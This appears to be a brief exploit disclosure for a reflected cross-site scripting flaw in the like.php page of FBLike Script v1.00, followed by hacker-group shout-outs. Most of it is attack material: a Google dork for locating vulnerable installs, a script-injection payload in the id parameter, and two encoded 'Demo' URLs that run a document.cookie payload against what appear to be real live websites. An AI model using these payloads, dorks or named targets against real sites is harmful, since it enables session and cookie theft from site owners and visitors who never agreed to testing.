FBLike Script suffers from a cross site scripting vulnerability.
c71e8559d3436f05fed29184dce0f98281b30b1685e4fa19b6b6246ec5639d21
# Exploit Title: FBLike Script Cross Site Scripting
# Google Dork: Copyright © 2010 FBLike Script
# Date: 25/03/2012 1:53 PM #EST
# Author: Crim3R
# software Link : http://zumset.com/product/fbilike_script_v100.html
# Version: v1.00
# Tested on: all
# CVE : XSS
========================================
The xss is in like.php
http://127.0.0.1/fbilike/like.php?id="><script>alert(XSS-By-Crim3R)</script>
========================================
Demo:
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
thanks to : H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel -
S.a.S - Net.Plus -
Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -
==============Crim3R=====================
All SST&HC Members